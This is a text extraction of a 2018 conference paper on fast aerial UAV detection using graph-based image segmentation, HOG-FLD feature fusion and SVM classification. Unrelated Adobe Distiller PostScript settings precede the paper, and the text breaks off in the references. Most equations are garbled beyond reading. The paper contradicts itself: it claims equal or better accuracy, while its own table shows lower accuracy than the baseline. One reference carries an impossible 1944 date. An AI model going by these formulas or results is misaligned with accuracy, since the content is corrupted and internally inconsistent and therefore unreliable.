/GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_ksosgebmubgflck3znj5ybltdq ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 106 Fast Aerial UAV Detection Based on Image Segmentation and HOG-FLD Feature Fusion Li Xiaoping School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, Shaanxi e-mail: 919083845@qq.com Lei Songze School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, Shaanxi e-mail: lei_sz@163.com Wang Yanhong School of Science Xi’an Technological University Xi’an, 710021, Shaanxi e-mail: 29314998@qq.com Xiao Feng a , Tian Penghui * b School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, Shaanxi e-mail: a 544070146@qq.com b 809576423@qq.com Abstract—In order to detect non-cooperative target UAV quickly and accurately, a novel method of UAV detection method based on graph theory and HOG-FLD feature fusion is presented in this paper. In order to avoid the time-consuming full search, the candidate areas of the UAV are obtained through the selective search of the image segmentation and the similarity, and the features are extracted through the method of gradient orientation histogram fusion FLD linear to train the SVM classifier with generalization ability to identify the UAV. The method can detect the UAV quickly and accurately under complicated background and circumstances of various position and angle. Compared with the sliding window method based on image segmentation and HOG+SVM, the experimental results show that the speed of this method has been obviously improved with the same recognition accuracy. Keywords-Image Segmentation; Graph Theory; HOG; FLD; SVM I. INTRODUCTION In recent years, UAV have been widely used in the military field. Due to its advantages of small size, low cost, low noise, high maneuverability, high concealment and superior stability, UAV can be applied to various of fields in the world for the purpose of reconnoitering enemy troops, detecting danger zone, tracking target, electronic interference, communication relay, and even completing the task of attack by carrying small-scale offensive weapons. Therefore, to detect non-cooperative UAV is necessary. To completed the task of independently identifying aerial non-cooperative UAV and monitoring in real time to border areas of different country could realize economic and extensive border surveillance and play a security role for the country and society. Recently, on the UAV detection technology of domestic and foreign scholars is rare. However, the difficulty of the UAV detection technology is mainly that the UAV in the picture is easily affected by the position, the angle, the distance from the camera and its own structure, which makes it difficult to detect the UAV. Above problem is extremely similar to difficulty of target detection technology and needs to research and practice. At present, the common methods used in target 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 107 detection are mainly following methods: the method based on the optical flow field [1], the inter-frame difference method and the background detection based on the target detection method. Optical flow target detection is a method of moving target, which the basic principle is: that a velocity vector is given to the moving target pixel, and the image will form an optical flow field, and its background will be obviously distinguished from the moving target vector. In the meanwhile, you can get the location of the target by analyzing dynamic image. This method is suitable for all kinds of backgrounds, and it has no requirement for background. Its drawbacks are that the number of pixels is too large, the distribution of optical motion fields is too wide and inaccurate, and the computation is too large. The method of inter-frame difference [2] is used to obtain the foreground of the target by using the threshold segmentation method to obtain the difference between the pixels of the adjacent two frames, whose calculation is small, and the ability of target recognition is poor when the illumination changes. In order to ensure the accuracy and integrity of UAV target detection, the traditional method of sliding window to detect UAV requires that the sample picture and the picture to be tested need to be scaled until the target of the image to be detected is less than or equal to the template size and the detection is stopped. So that the UAV which is larger than or equal to the template size can also be detected accurately after adjusting the pixel size of the whole image to be tested. However, the HOG feature [3-5] is extracted after the image is scaled. Extracting HOG feature need to traverse the whole image by sliding window [3] until the edge contour feature of high dimension can be obtained by matching, so that the traversal need to take a long time, which leads to the slow generation of feature descriptors, and the scale of each level requires a large amount of computation. An image segmentation method based on graph theory and HOG-FLD feature fusion is proposed for UAV detection in this paper. This method is divided into training stage and test stage. In the training stage, it is necessary to unify and gray-scale processed the pixel size of positive and negative samples set be collected in advance, and then it could obtain the feature vector with small dimension which can stably describe the UAV contour feature after the feature extraction is carried out by using HOG-FLD feature fusion method. Finally, the feature vector is input into the support vector machine model, the support vector machine classifier is trained after a series of statistical learning. In the test stage, the candidate regions are screened out by using the segmentation method based on graph theory and are extracted features according to the feature extraction method of the training stage, and then the extracted features are input into the trained classifier to carry out classification and detecting whether the candidate area includes the target UAV. Image segmentation uses the connected method of graph [6] or the minimum spanning tree to merge the region, which mainly determines whether to merge the two regions according to the similarity of each region of the image. This method could not only obtain the global features of the image and the candidate area of UAV, but also the calculation speed is very fast and the processing efficiency is also high. The features obtained by combining the HOG features of gradient histogram and the Fisher linear discriminant analysis (FLD) are selected as the features of the statistical learning training classifier in feature extraction stage. Because of the advantages that the features of small dimension and good robustness and good classification ability extracted by HOG-FLD feature fusion are rarely affected by the changes of local illumination, background change, target location and angle change, it is easier to train a classifier that is easy to classify and has strong generalization ability. II. SEGMENTATION Method Based on Graph Theory to Obtain Region of Interest A. Segmentation Method Based on Graph Theory Image segmentation is a way to separate the image into regions with different characteristics and separate the interested objects from the background in the segmented blocks. Let interest objects and backgrounds in segmented regions show a clear sense of contrast based on human visual effects. Image segmentation method plays an important role in further 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 108 analysis of image such as image compression and image recognition. The image segmentation method based on graph theory (Graph-Based Image Segmentation) and the region merging method are selected to segment the image in this paper. The image segmentation method based on graph theory takes the image as the object transforming the image into the right undirected graph, and uses the connected branch method of graph [6] to segment the image, and then it could obtain the region block. The region merging method is to merge the segmented region blocks according to the specific merging rules. Because of great different characteristics of the UAV and the background in texture, color, size and degree of agreement, regional block of great different characteristics need to be decomposed and regional block of small different features need to be merged [11], which follows the principle of [10] the optimal segmentation. B. Acquisition Principle of UAV Region of Interest The image contains information such as shape, size, color, texture and so on. Image will be segmented after the whole image is traversed by the search algorithm of graph theory. In the graph theory, the definition of the image - to - graph [12] is described as follows: ),( EVG  is an undirected graph with V as its vertex and E as its edge set. Any edge Evv ji ),( is defined as a weight function ),( ji vvW greater than zero. Any vertex ji vv , represents the pixel point of the graph to be processed in graph theory, and the weight of any edge represents the gray difference, the distance or some other features between the adjacent pixels of i v , j v and ),( ji vv in an image. Using Graph Cuts algorithm [7], the graph G is divided into several disjoint independent regions, and the region is defined as )',(' EVG  , E' is a subset of E. The regions of the picture is segmented by the algorithm of Minimun Spanning Tree(MST) [14] that the difference of the pixels in the same region is measured through the maximum weight edge, of which the largest weight edge of segmentation region values are defined as follows: )(max)( ),( eCInt ECMSTe     VC   Where C is the generated partition region, and ),( ECMST represents the set of partitioned regions or the Minimun Spanning Tree [17] that C generates in E. The resulting dissimilarity between pixels within the segmented region could also be understood as the weight of the minimum edge that connects the vertices of two segmented regions, as defined below: )),((min),( ),(,, 21 21 ji EvvCvCv vvwCCDif jiji    When there is no edge connection between the two partitioned regions, there is ),( 21 CCDif . The condition for the appearance of its partition boundary is defined as follows:      otherwisefalse CCMIntCCDififtrue CCD ),(),(, ),( 2121  If true in the expression is satisfied, then the boundary is represented, then the region is segmented. otherwise, it is merged. Where the smallest internal difference of division is defined as follows: ))()(),()(min(),( 221121 CCIntCCIntCCMInt    () is a threshold function, which is used to control the merging degree of the image segmentation region, which is defined as CkC /)(  , where C is the number of the segmentation region or the vertex, and k is a constant parameter that is used to control the coarse granularity of its image segmentation area. The segmentation effect is shown in Figure 1 (b).That small regions will be merged means detecting whether the segmented region meets the regional boundary conditions, if not, then they will be merged. The regional boundary conditions could be measured by the following four types of similarity in the image: 1) Color [13] similarity ),( jicolour rrS means that 25 bins one-dimensional color histogram of the three color channels 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 109 are acquired after image is normalized. Or that means that the three color components are combined into one dimensional feature vector, so that each region of the image could be represented as a 75 dimensional feature vector },...,{ 1 n iii ccC  , and the color calculation formula of the region is: )()( )()( ),min(),( 1 ji jjii t n k k j k ijicolour rsizersize CrsizeCrsize C ccrrS        Where )( irsize is the number of pixels contained in the region( i r ), and the number of pixels contained in the new region is )()( ji rsizersize  . 2) Texture [13] similarity ),( jitexture rrS means that calculate Gaussian differential for 8 different directions of three color channels separately (its 1 ), 10 bins one-dimensional histogram of each direction of three color channels is respectively obtained after image is normalized, and then the region could be expressed as a 240-dimensional vector },...,{ 1 n iii ttT  , and its texture similarity calculation formula is as follows:    n k k j k ijitexture ttrrS 1 ),min(),(  3) Dimension similarity ),( jisize rrS , which is used to merge smaller regions as early as possible. Its formulas are as follows: )( )()( 1),( imsize rsizersize rrS ji jisize    Where im refers to the whole image. 4) The matching similarity ),( ji rrfill is used to merge the intersected regions as soon as possible. Its account form is as follows: )( )()()( 1),( imsize rsizersizeBBsize rrfill iiij ji   (9) the similarity set S could be gotten by combining these four kinds of similarity, and the formula of the combination is as follows: ),(),( ),(),(),( 43 21 jifilljisize jitexturejicolourji rrSarrSa rrSarrSarrS    In order to judge whether the boundary condition of }1,0{ia satisfies the similarity. The two segmented region blocks i r and j r which have the largest similarity are merged and a region t r is obtained after the similarity degree of the segmented regions in the similarity set S is compared and sorted. The similarity between two adjacent regions of i r and j r in the set S is removed in the meanwhile. Then according the step of this method , we begin to calculate the similarity between the new merged region t r and its current adjacent regions, and we add this similarity to the similarity set S again. At the same time, we also add t r to the region set R , and we finally label the region with a rectangular box. The segmentation effect is shown in Figure 1 (c) and (d). 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 110 a) Original map b) Segmentation of graphs based on Graph Cuts algorithm c) Segmentation graph of the algorithm in this paper d)The partitioned graph after adjusting parameters Figure 1. Image Segmentation III. TARGET UAV DETECTION BASED ON HOG-FLD FEATURE FUSION AND SVM DETECTION The method could be divided into two stages from the perspective of practice: training and testing. In the training stage, the window with constant shape and size is used to traverse the whole UAV or non-UAV sample images, and the feature is extracted by HOG-FLD feature fusion method. A computable feature vector is obtained to describe the contour of the image, which is robust and easy to classify. The SVM classifier [8-9] for UAV detection could be obtained by statistical analysis and learning of these Eigenvectors. In the early stage of the test, the same method as the training stage is used to extract the feature of the regions to be detected, and the candidate targets of these areas are classified by the trained SVM classifier in the later stage to determine if the target in the candidate area is a UAV. A. Feature Extraction From HOG-FLD Feature Fusion Because the edge contour feature of UAV has strong stability and extensibility, the HOG feature with strong ability to describe contour is extracted from data set. However, because of the large dimension of HOG feature vector, it is unfavorable to the training of classifier. In order to train the classifier with good classification ability, it is necessary to reduce the dimension of extracted HOG feature by FLD [18] feature fusion and finally obtain the feature vector with small dimension. To sum up, the feature extraction based on HOG-FLD feature fusion is adopted in this article. The basis of feature extraction in this article is to extract feature of gradient histogram of oriented gradient (HOG). The thought of algorithm is as follows: calculating the gradient of selected image; The whole image is divided into rectangular cells of fixed size and equal size, each cell has pixel including mm ; the cell is divided into 9 undirected channels) or 18 directed channels, and the gradient histogram of each direction is voted on. The voting weight is the gradient value that has been calculated earlier. The divided cell units above are composed of fixed blocks of the same size. Each block contains nn  cell elements, which the local eigenvector corresponding to each block is normalized in order to reduce the effect of illumination on the results. The feature vectors of these blocks are combined to form the HOG feature vectors of the image. The steps of extracting HOG feature are as follows: graying the positive sample image of UAV, filtering the input image with Gamma correction method so that the image could achieve the standard contrast of color space and reduce the effects of local shadows and light changes on the image; dividing the image into a certain number of cells, and forming a fixed number of cells into a certain number of blocks of equal size as in the preceding paragraph, classifying the gradient range according to the above mentioned rules, we could 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 111 calculate the cell features in these blocks and finally connect all the blocks together to obtain the feature vector containing the whole target UAV image. Formula (11) is a formula for normalizing the image, formula (12) and formula (13) could calculate the gradient component of each pixel, formula (14) and formula (15) could calculate the size and direction of the gradient. )||/(|| 1  ggg vvv  ),1(),1(),( yxyxyx pipiGx    )1,()1,(),(   yxyxyx pipiGy  ),( 2 ),( 2 ),( yxyxyx GyGxS   )/arctan( ),(),(),( yxyxyx GxGy  Where  g v is the result of histogram normalization, and gv is the extracted vector histogram; ),1( yxpi  , ),1( yxpi  , )1,( yxpi , and )1,( yx pi respectively denote the location of 4 pixel points; ),( yx Gx and ),( yx Gy respectively denote the coordinate position in the horizontal and vertical directions of the two pixels. And ),( yx S , ),( yx  respectively denote the length of the gradient direction vector and the angle of the gradient direction vector. In this article, a window including 64 * 128 pixel is used to scan the sample image and the image to be detected using a window including 64 × 128 pixel. The scanning step size is 8 pixels (scanning is in horizontal and vertical direction). The window is divided into cells including 8 * 8 pixel and forms 8 * 16 = 128 units. Then setting up four adjacent units up and down to the left and right as a block of pixels, a window contains 105 blocks of pixels. A 3780 dimensional feature vector named HOG feature description value is generated in a window containing 105 pixel blocks according to the calculation steps of HOG. Its specific HOG algorithm is shown in Figure 2: 8*8 pixel unit 16*16 pixel blocks 64*128 pixel window image 8 pixels per step Figure 2. Principle Diagram of HOG Algorithm On the basis of HOG feature, the linear subspace is constructed by using Fisher Linear Discriminant Analysis (FLD) [18]. By calculating the optimal projection matrix, the projection matrix for feature extraction of the training set is obtained, and the similarity of its projection vector is taken as the similarity degree cos S of cosine similarity, which purpose is to reduce the intra-class dispersion W S as much as possible and to increase the inter-class dispersion B S as much as possible (or that is in the training concentration, to make the sample data of the same UAV as close as possible, and the sample data of different UAV to be far away). In this way, the features with classification ability are extracted. When dealing with a problem that type is c, the mathematical formulas of inter-class dispersion BS and intra-class dispersion W S should be defined as follows: T i c i iiB NS )()( 1       T ik c i ik x W xxS ik )()( 1        Where i  denotes the mean value of class i  ;  means the mean value of total sample; i  means the number of samples of class i  . The optimal projection matrix opt W could be obtained by solving the optimization problem such as formula (18), where W S must be a nonsingular matrix (or that is 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 112 the total number of training samples N is greater than the characteristic dimension of UAV image): || || maxarg WSW WSW W W T B T W opt   opt W could also be obtained by solving the generalized eigenvalue problem such as the formula (19):   WSWS WB  In order to solve the problem that the intra-class dispersion matrix W S is singular, PCA principal component analysis (PCA) is used to reduce the dimension of the feature space (dimensionality reduction to N-cu), and then Fisher linear discriminant analysis (FLD) is used to deal with it. The projection vector y of test sample x is obtained according to formula (20): xWy T opt   Cosine similarity cos S is used as the similarity measure of projection vector y. Where the cosine similarity cos S of vector },,,{ 21 n aaaA  and },,,{ 21 n bbbB  is defined as follows: 22 1 22 cos |||||||||||||||| , BA ba BA BA S n i ii   B. Support Vector Machine Because the support vector machine (SVM) proposed by Vapnik has the advantages of simple system structure, global optimization, good generalization, and short training and prediction time [9], this paper uses SVM as a machine learning tool to calculate the rule of samples in order to achieve fast and efficient learning sample features and accurate classification purposes. The main idea of SVM is to deal with the linear inseparability of the original space by selecting the kernel function of Polynomial Kernel to correspond the data to the high-dimensional space. When the algorithm is used to realize the two-classification, the sample features such as HOG must be extracted from the original space first, and then the sample features in the original space are represented as a vector in the high-dimensional space. In order to minimize the error rate of the two class classification problems, we need to find a hyperplane that is used to divide the two classes in the high dimensional space. Let the sample set be ii yx , , where i=1,2,...,N, e i Rx  , }1,0{iy is the class identifier. Then in e dimensional space, its linear discriminant function is as follows: bxwxg )(  The formula of the classification surface equation is as follows: 0 bxw  After normalization of the discriminant function, the following conditions must be satisfied for the two types of samples: 1)( xg  The classification interval could be |||| 2 w , where the maximum requirement |||| w for the classification interval is kept to a minimum, all samples must be correctly classified, and the following conditions must be met: 01])[(  bxwy ii  An SVM whose inner product function is ),( ji xxk is constructed with the following formulas (which can be understood as the formula for calculating the extreme value of a quadratic function with conditional constraints): ),()( 1 ji N i jiji xxkyyaaaQ     Its constraints are expressed as:    N i iii yaCa 1 0,0 The formulas of the support vector machine that could be calculated are as follows: 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 113 )),(sgn()( 1     N i iii bxxkyaxf  Among them,  b is a constant parameter, indicating the size of the threshold that needs to be classified. C. Sample Preparation and Classifier Training In this article, 900 positive sample images and 900 negative sample images are selected, and 500 original images of positive samples are selected to calculate the aspect ratio of UAV. An image that aspect ratio is 1:2 is obtained, and the pixels are normalized to 256 * 512 to avoid the effect of image size on the recognition effect. As described in the HOG feature section above, each image could produce 105 pixel blocks, and each pixel block could obtain a 36-dimensional feature vector, so a image will finally produce a 3780 dimensional HOG feature vector. The extracted HOG vector is used as the input vector of Fisher linear discriminant analysis algorithm to reduce the dimension of the whole vector. The dimension of the vector is adjustable and its parameter is determined according to the recognition efficiency of the experiment. Sending the vector reduced dimension to the SVM model, the SVM classifier is obtained to detect whether the UAV is included in the image under test. IV. PARAMETER ANALYSIS AND EXPERIMENTAL RESULTS The environment used in this experiment is that the simulation software of Matlab R2015b based Windows 7 on 64-bit operating system. Where CPU of computer is i5-6500 and its installed memory is 4.0 GB, and the number of the test images are 200. The best detection effect is obtained by adjusting the important parameters that affect the experimental results. A. Parameter Selection of FLD In the process of extracting feature vector, the dimension that needs to be reduced by Fisher linear discriminant analysis algorithm is the parameter k of FLD algorithm, which changes with the change of this parameter. The contrast graph of recognition time is shown in Figure 3. It can be seen from the graph that when k is 50, the whole algorithm has the least recognition time. Figure 3. The time Chart with Parameter k Changed B. Experimental Effect of Aerial UAV Detection Algorithm Based on Region of Interest Experiments show that in the whole algorithm, when the number of pixels in the divided blocks is 8*8, SVM kernel function type is 2, when the threshold of segmentation is k=90 and sigma=10, The algorithm has the best overall recognition effect on accuracy rate and time, and the recognition result is shown in Figure 4: Picture(a) Picture (b) Picture (c) Picture (d) Figure 4. Identification Results C. Comparison of Detection Effect of Traditional HOG-SVM UAV Detection Algorithm In order to verify the efficiency of the proposed method, the experimental results of the proposed method are compared with the experimental results of the HOG and SVM method based on image segmentation, and the experimental results are obtained by statistics. As shown in TABLE I, and the average recognition time of this method is faster than that of the latter method. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 114 TABLE I. COMPARISON RESULTS OF THE TEST METHODS Test Method Accuracy Rate Time HOG-FLD+SVM 93.35% 0.090s HOG+SVM 95.75% 0.160s V. TAG The mechanism based on the region of interest to obtain the region of interest is used in this article. In the testing phase, the acquired regions of interest are input into the trained SVM classifier, which reduces the recognition time. The dimension reduction of Fisher linear discriminant analysis (FLD) makes SVM easy to train and in the phase of feature vector extraction. Compared the HOG-SVM detection method based on image segmentation with the region of interest based aerial UAV detection algorithm, this paper uses Matlab to carry out simulation experiments. The experimental results show that the detection algorithm based on region of interest is better than the sliding window method based on image segmentation to detect UAV in terms of accuracy and time. ACKNOWLEDGMENT Fund projects: Key projects in the Industrial Field of Shaanxi (2016KTZDGY4-09), Scientific Research Program Funded by Shaanxi Provincial Education Department (17JK0364), National Natural Science Foundation of China (61572392), State and Provincial Joint Engineering Lab. of Advanced Network and Monitoring Control (GSYSJ2016008), Scientific Research Program Funded by Shaanxi Provincial Education Department (16JK1379). REFERENCES [1] J. Barron, D. Fleet, S. Beauchemin, “Performance of optical flow techniques,” International Journal of Computer Vision, vol.12, pp. 42-77, 1944. [2] A. Lipton, H. Fujiyoshi, R. Patil, “Moving target classification and tracking from real-time video,” Proc IEEE Workshop on Applications of Computer Vision, , pp. 8-14, 1998. [3] DALALN, TRIGGS B, “Histograms of oriented gradients for human detection,” Proc 